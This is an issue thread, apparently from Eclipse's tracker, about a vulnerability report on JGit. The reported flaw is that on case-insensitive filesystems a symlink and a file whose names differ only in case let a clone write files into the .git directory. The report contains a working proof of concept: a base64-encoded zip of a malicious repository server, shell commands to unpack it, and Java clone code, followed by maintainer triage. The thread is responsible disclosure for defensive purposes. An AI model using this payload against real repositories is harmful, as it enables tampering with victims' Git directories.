JGit: Improper handling of case insensitive filesystems in JGit allows arbitrary file write

Report from the security@ mailing list:

RyotaK ryotak.mail@gmail.com

8:50 AM (48 minutes ago)

to security Hello Eclipse security team, I'm a security researcher who discovered a vulnerability in JGit.

In org.eclipse.jgit/src/org/eclipse/jgit/dircache/BaseDirCacheEditor.java, the following code is used to compare the name conflict.

org.eclipse.jgit/src/org/eclipse/jgit/dircache/BaseDirCacheEditor.java line 183-185

int cmp = compareSameName(
        ePath, prefixLen, ePath.length,
        nPath, prefixLen, s, m);

Because this code doesn't validate whether the filesystem is case sensitive, a malicious repository can cause unintended write to the symbolic link using conflicted filenames. For example, assuming the following two files are included in the repository, hacked will be written to the .git directory instead of the dir1 directory on the case-insensitive filesystem.

Dir1 (symbolic link to .git directory)
dir1/hacked

Steps to reproduce: Since I read that the Eclipse security team can't download attachments, I'm embedding all codes into this email.

1. Execute the following command:

echo "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"
| base64 -d > poc.zip && unzip poc.zip

2. Run docker compose up -d.
3. Execute the following Java code:

File localPath = new File("./TestRepo");
Git.cloneRepository()
  .setURI("http://localhost:18080/test.git")
  .setDirectory(localPath)
  .call();

4. Confirm that a file called .git/hacked is created.

Best regards, RyotaK

And the followup message:

I forgot to note that I only tried it on macOS, and I haven't tested
it on Windows. Please use macOS while reproducing the issue.

assigned to @mbarbero and @mrybczyn

made the issue visible to everyone

assigned to @msohn

made the issue confidential

changed the description

changed title from placeholder to JGit: Improper handling of case insensitive filesystems in JGit allows arbitrary file write

@msohn, please log in to GitLab before accessing this issue; otherwise, you will get a 404.

Also, note that it is a confidential issue; only JGit people who are directly added can access it. If you need any other project members to be added, please let us know.

added From_ML label

made the issue visible to everyone

assigned to @ryotak

made the issue confidential

I would prefer if all JGit committers can see and comment on JGit vulnerability reports.

Hi RyotaK, thanks for your report. I could reproduce what you described and will look into fixing that.

Could you explain what's done in that docker container ? Why should I compile git in order to prepare this test ? It's about a jgit vulnerability right ? I guess you could instead install the latest git release. What's the purpose of running node in that container ?

Hello @msohn, Thank you for validating the report!

Could you explain what's done in that docker container ? Why should I compile git in order to prepare this test ? It's about a jgit vulnerability right ? I guess you could instead install the latest git release. What's the purpose of running node in that container ?

Because I was originally trying to find a vulnerability that is exploitable on Linux, I had to modify Git itself and host a malicious tree object with / in the name. (This is not possible with JGit.)
While doing so, I built a Docker image that compiles the Git and runs an http-git-backend with Node.js. It currently doesn't do anything against Git itself, but rather setups a malicious repository.
However, since I thought that end-to-end PoC is easier to reproduce, I kept it as-is and sent you Dockerfile. (But as you mentioned, compiling Git wasn't necessary. You can install it via apt and adjust the path to git-http-backend in index.js)

made the issue visible to everyone

assigned to @aloskutov

assigned to @gunnar

assigned to @jnieder

assigned to @szivkov